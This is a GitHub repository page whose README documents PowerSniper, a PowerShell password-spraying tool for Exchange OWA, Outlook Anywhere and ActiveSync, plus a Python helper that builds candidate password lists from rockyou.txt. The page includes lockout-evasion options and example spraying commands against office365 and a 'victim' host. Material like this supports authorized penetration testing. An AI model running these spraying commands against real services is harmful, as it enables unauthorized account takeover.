Skip to content
Password spraying script and helper for creating password lists
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
PowerSniper.ps1
README.md
passdist.py
toplist_rockyou.txt

README.md

PowerSniper

Password spraying script and helper for creating password lists.

The Python script uses configurable parameters to extract complex passwords from a password list such as rockyou.txt. It then analyzes the Damerau-Levenshtein distance between that password and a list of common passwords (the text file in this repository is the top 20 most common rockyou passwords that could be easily modified to be a complex password, i.e. not the one's that are all digits). The script is configurable for the maximum distance to keep a password, with a default of 4, and will output results to a CSV file.

The PowerShell script loops through usernames and passwords and attempts to authenticate with them against various Microsoft Exchange web-based services.  The script supports pausing after a specified lockout count for a specified period of time to prevent account lockouts.

PowerSniper supports password spraying against the following services at this time:

  • Outlook Web Access
  • Outlook Anywhere
  • ActiveSync

The code that loads the Microsoft.Exchange.WebServices.dll for Outlook Anywhere authentication was found in the MailSniper tool (https://github.com/dafthack/MailSniper) created by @dafthack.

Requirements

passdist.py requires jellyfish

Usage

usage: rockdist.py [-h] --wordlist WORDLIST --toplist TOPLIST [--output OUTPUT] [--passmin PASSMIN] 
                        [--passmax PASSMAX] [--complex] [--passdist PASSDIST]
                        
  Get the distances between complex passwords and top passwords used

  optional arguments:  
    -h, --help           show this help message and exit  
    --wordlist WORDLIST  the file with the complex rockyou passwords (default: None)  
    --toplist TOPLIST    the file with the top rockyou passwords (default: None)  
    --output OUTPUT      the CSV output of the analysis (default: analysis.csv)  
    --passmin PASSMIN    the minimum size password to choose from (default: 7)  
    --passmax PASSMAX    the maximum size password to choose from (default: 12)  
    --complex            require complex passwords (default: 0)  
    --passdist PASSDIST  the maximum distance between passwords to keep (default: 4)

Example passdist.py command:

    python passdist.py --wordlist rockyou.txt --toplist toplist_rockyou.txt --output lowdist.csv --passmin 7 
        --passmax 12 --complex --passdist 4
NAME    
  Invoke-PowerSniper
  
SYNOPSIS    
  This module loops through usernames and passwords and attempts to authenticate with them against various 
  Microsoft Exchange web-based services.
  
    PowerSniper Function: Invoke-PowerSniper    
    Author: Josh Berry (@codewatchorg)    
    License: BSD 3-Clause    
    Required Dependencies: None    
    Optional Dependencies: None

SYNTAX    
  Invoke-PowerSniper [[-uri] <Object>] [[-svc] <Object>] [[-userlist] <Object>] 
      [[-passlist] <Object>] [[-sos] <Object>] [[-lockout] <Object>] 
      [[-locktime] <Object>] [<CommonParameters>]

DESCRIPTION    
  This module loops through usernames and passwords and attempts to authenticate with them against 
  various Microsoft Exchange web-based services.  The script supports pausing after a specified 
  lockout count for a specified period of time to prevent account lockouts.

RELATED LINKS    
  https://blogs.technet.microsoft.com/meamcs/2015/03/06/powershell-script-to-simulate-outlook-web-access-url-user-logon/
  http://mobilitydojo.net/2010/03/30/rolling-your-own-exchange-activesync-client/
  http://mobilitydojo.net/2011/08/24/exchange-activesync-building-blocks-first-sync/
  http://mobilitydojo.net/files/EAS_BB/Part_02/HTTP_GET.cs
  https://blogs.technet.microsoft.com/heyscriptingguy/2011/12/02/learn-to-use-the-exchange-web-services-with-powershell/
  http://stackoverflow.com/questions/1582285/how-to-remove-elements-from-a-generic-list-while-iterating-over-it
  https://github.com/dafthack/MailSniper

Example PowerSniper.ps1 usage:

    # Outlook Anywhere Test
    Invoke-PowerSniper -uri https://outlook.office365.com -svc oa -userlist users.txt -passlist passwords.txt 
        -sos false -lockout 6 -locktime 30
    
    # ActiveSync Test
    Invoke-PowerSniper -uri https://outlook.office365.com -svc as -userlist users.txt -passlist passwords.txt 
        -sos false -lockout 6 -locktime 30
    
    # Outlook Web Access Test
    Invoke-PowerSniper -uri https://mail.victim.com/owa/auth.owa -svc owa -userlist users.txt 
        -passlist passwords.txt -sos false -lockout 6 -locktime 30
You can’t perform that action at this time.